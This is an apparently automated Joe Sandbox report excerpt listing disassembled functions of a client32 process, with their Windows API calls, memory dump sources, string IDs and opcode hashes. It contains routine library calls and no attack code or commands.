                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: ERROR$RESULT
                                                                                                                                        • API String ID: 3168844106-833402571
                                                                                                                                        • Opcode ID: 0dd32c39f70a8415763b7a13ae9f9d3cd0645aa9b54ba2b2957ac5bb403352dc
                                                                                                                                        • Instruction ID: dc09d6e2cdcbea49146df7662f42e8f9adacf1eb9e43e646733363e4c5f7b1af
                                                                                                                                        • Opcode Fuzzy Hash: 0dd32c39f70a8415763b7a13ae9f9d3cd0645aa9b54ba2b2957ac5bb403352dc
                                                                                                                                        • Instruction Fuzzy Hash: 86016DF7C082153FEF208AA89C4196F76E89B561A4FC40538FA4AC7100F735D90583E2
                                                                                                                                        Function 688F7E39 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 49COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,00000000), ref: 688F7EB7
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,00000000), ref: 688F7ED0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: RESULT$b
                                                                                                                                        • API String ID: 3168844106-4141403093
                                                                                                                                        • Opcode ID: cda4e50334e42bdb1ec4c8d0a3664c75cc095f5be4540bf8091c16e777ca1277
                                                                                                                                        • Instruction ID: 4ce6865c4d6c35552bc128ceec046437b156ee2572e2723d354035e02f2fb6d9
                                                                                                                                        • Opcode Fuzzy Hash: cda4e50334e42bdb1ec4c8d0a3664c75cc095f5be4540bf8091c16e777ca1277
                                                                                                                                        • Instruction Fuzzy Hash: 0F1148B5C04209AFEF20DFA4C8057AEBBF4FF09304F4044AAD51AE6240E7359A54DFA2
                                                                                                                                        Function 6890C170 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6890C190
                                                                                                                                        • _malloc.LIBCMT ref: 6890C199
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6890C1B0
                                                                                                                                          • Part of subcall function 6890BA20: __strdup.LIBCMT ref: 6890BA3A
                                                                                                                                        • _free.LIBCMT ref: 6890C1C2
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocateErrorFreeLast__strdup_free_malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2344877359-0
                                                                                                                                        • Opcode ID: 42e69b1d70bf9c322fdd62ec5599f81344eb3bc9432179871783536001e4dd84
                                                                                                                                        • Instruction ID: 9e3119ab55f29d1648c54c19800643587df60e231a96e4eab920a3f727eeed43
                                                                                                                                        • Opcode Fuzzy Hash: 42e69b1d70bf9c322fdd62ec5599f81344eb3bc9432179871783536001e4dd84
                                                                                                                                        • Instruction Fuzzy Hash: BAF0B47578921877F63046494C46FBF765CCB97B75F200255FB18AB2C0E6A0BC0082B9
                                                                                                                                        Function 6890C7A0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6890C7BF
                                                                                                                                        • _malloc.LIBCMT ref: 6890C7C8
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6890C7E2
                                                                                                                                          • Part of subcall function 6890C600: _memmove.LIBCMT ref: 6890C698
                                                                                                                                        • _free.LIBCMT ref: 6890C7F3
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocateErrorFreeLast_free_malloc_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3230522339-0
                                                                                                                                        • Opcode ID: e17a7ab1cb7e863c245946ec65746883b75867ccbf610b950226bc3c8a8cb5eb
                                                                                                                                        • Instruction ID: 98336cb2bfd983da7722c49ebcd00f6f5efb9e5e9b171fcb95155d21de0e1668
                                                                                                                                        • Opcode Fuzzy Hash: e17a7ab1cb7e863c245946ec65746883b75867ccbf610b950226bc3c8a8cb5eb
                                                                                                                                        • Instruction Fuzzy Hash: D9F0827538C2147BF63016999C46F7F764C8B66B79F700325FB25AA2C0D9E0B80082B9
                                                                                                                                        Function 6890F4E0 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6890F4EE
                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6890F4F8
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890F518
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890F52C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2905768538-0
                                                                                                                                        • Opcode ID: f50f996d11fc575f3c391d734b0d111323c1e771b34a5d483767e03aeb21d773
                                                                                                                                        • Instruction ID: 1caee3c3d8b3c6cd31f3dc5473ecc808140d50751e0d46fc8a46ecee685da511
                                                                                                                                        • Opcode Fuzzy Hash: f50f996d11fc575f3c391d734b0d111323c1e771b34a5d483767e03aeb21d773
                                                                                                                                        • Instruction Fuzzy Hash: B6F06276204218EFC721DF58D8448AE77BCFF9A326B10416AF946D7200D770AA49CBE5
                                                                                                                                        Function 688F5B30 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 688F5B45
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F5B76
                                                                                                                                        • SetEvent.KERNEL32(00000318), ref: 688F5B8E
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F5B99
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3394196147-0
                                                                                                                                        • Opcode ID: 046729647e86260430cd994729de443db5791921d320a9d2c1c61296e0b549f4
                                                                                                                                        • Instruction ID: 43ccce4e797fbc26d90ef00dc7688192843e6306a15cc5f6872d99299c877c3d
                                                                                                                                        • Opcode Fuzzy Hash: 046729647e86260430cd994729de443db5791921d320a9d2c1c61296e0b549f4
                                                                                                                                        • Instruction Fuzzy Hash: F8F06232448AB5AFCF319FA8944849D7BB4F7463A57808856E95F97801D720E846CBA1
                                                                                                                                        Function 688F5AC0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 688F5AD0
                                                                                                                                        • _memmove.LIBCMT ref: 688F5AEC
                                                                                                                                        • _memmove.LIBCMT ref: 688F5B0A
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F5B17
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_memmove$EnterLeave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 324922381-0
                                                                                                                                        • Opcode ID: f9c857ec5f8f91c08e495680718b5f9b343a481d109e7428c4427d346b6384b4
                                                                                                                                        • Instruction ID: 4d24eebb8a3f970e2598f8a0d8ee2650be7db1656149aba59ea41519237adeaf
                                                                                                                                        • Opcode Fuzzy Hash: f9c857ec5f8f91c08e495680718b5f9b343a481d109e7428c4427d346b6384b4
                                                                                                                                        • Instruction Fuzzy Hash: 5AF0FE79608B24AFAA74DB64D895C2E73F9EBC5750B848828ED5A87700D721EC409BA1
                                                                                                                                        Function 688F2710 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F2230: IsDBCSLeadByte.KERNEL32(00000000,?,?,688F24A2,?,?,688FE64B,?,publish,?,?,?,?,?,?,?), ref: 688F224C
                                                                                                                                        • CompareStringA.KERNEL32(00000400,00000000,?,?,?,?), ref: 688F291B
                                                                                                                                          • Part of subcall function 68912BF9: __isdigit_l.LIBCMT ref: 68912C1E
                                                                                                                                        • _strncmp.LIBCMT ref: 688F294F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCompareLeadString__isdigit_l_strncmp
                                                                                                                                        • String ID: {-.
                                                                                                                                        • API String ID: 3286074029-1528367491
                                                                                                                                        • Opcode ID: d91a63b68def0fa73823965059bd22ed96af9ddef40cb9eb1e476ae76802cb62
                                                                                                                                        • Instruction ID: d37fd076296f1e46635dbb8e6fe3be40e10c67bc54f8397ccb11164289720ae0
                                                                                                                                        • Opcode Fuzzy Hash: d91a63b68def0fa73823965059bd22ed96af9ddef40cb9eb1e476ae76802cb62
                                                                                                                                        • Instruction Fuzzy Hash: 81714B64B0C2D95BEB109EB94C4077A7BE49F4E294F94487AECF487241E33DC943D2A1
                                                                                                                                        Function 110071D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                        • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
                                                                                                                                        • SetFocus.USER32(?), ref: 11007383
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFocusWindow_memsetwsprintf
                                                                                                                                        • String ID: edit
                                                                                                                                        • API String ID: 133491855-2167791130
                                                                                                                                        • Opcode ID: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
                                                                                                                                        • Instruction ID: f78834b4020d8e2e6f829c6f5032a1a8cba214c943ee8e0f2be50220b25a4479
                                                                                                                                        • Opcode Fuzzy Hash: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
                                                                                                                                        • Instruction Fuzzy Hash: 4851B0B5A00606AFE741CFA8DC80BABB7E5FB48354F11856DF995C7340EA34A942CB61
                                                                                                                                        Function 68900DC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68900EEB
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68900F00
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: PIN
                                                                                                                                        • API String ID: 1338273076-589459321
                                                                                                                                        • Opcode ID: d35aa92caba9c1f016268559d1efd29061c58f83152634aae62207a21ae4b1cb
                                                                                                                                        • Instruction ID: 8d9845c812b1d5b0e70bde0332543c94788795ac386ce81fa824580aaa11dce5
                                                                                                                                        • Opcode Fuzzy Hash: d35aa92caba9c1f016268559d1efd29061c58f83152634aae62207a21ae4b1cb
                                                                                                                                        • Instruction Fuzzy Hash: F9410EB5D04248AFDF10DFE8D8809AEBBB8FB59318F90452EE426E7240E7359A44CB51
                                                                                                                                        Function 688FFB60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688FFBD5
                                                                                                                                        • _memmove.LIBCMT ref: 688FFC26
                                                                                                                                          • Part of subcall function 688FF470: std::_Xinvalid_argument.LIBCPMT ref: 688FF48A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                        • String ID: string too long
                                                                                                                                        • API String ID: 2168136238-2556327735
                                                                                                                                        • Opcode ID: 675a0ef90f67fc60577e46466d6eda103b300ac55a815254a43d685bbe351327
                                                                                                                                        • Instruction ID: f12b91b900cae880464b63ee47fdad1c89ef756c5f1751ef1dd5d5776d4ebbc7
                                                                                                                                        • Opcode Fuzzy Hash: 675a0ef90f67fc60577e46466d6eda103b300ac55a815254a43d685bbe351327
                                                                                                                                        • Instruction Fuzzy Hash: D53109323046204BD3208E5CE89096AF7E9EBB56A4BA04D3FF991C7750CBE1DC42C3A1
                                                                                                                                        Function 689076F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc
                                                                                                                                        • String ID: buf$e:\nsmsrc\nsm\1210\1210f\ctl32\uuencode.c
                                                                                                                                        • API String ID: 1579825452-1222102314
                                                                                                                                        • Opcode ID: 9e8ea965835b7adfc9b92d91fa096192cd0074a4a0774b332255f3ad9df77520
                                                                                                                                        • Instruction ID: 6305d350ab4c339c3062bee1c9e702bfcb7ea08437038df521c4cc576ae0f5b6
                                                                                                                                        • Opcode Fuzzy Hash: 9e8ea965835b7adfc9b92d91fa096192cd0074a4a0774b332255f3ad9df77520
                                                                                                                                        • Instruction Fuzzy Hash: 1C213AA6E411412FD3010A3C5C945FA37EC8B67138B584739E8BAC72C2F636D50E8362
                                                                                                                                        Function 688F79C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
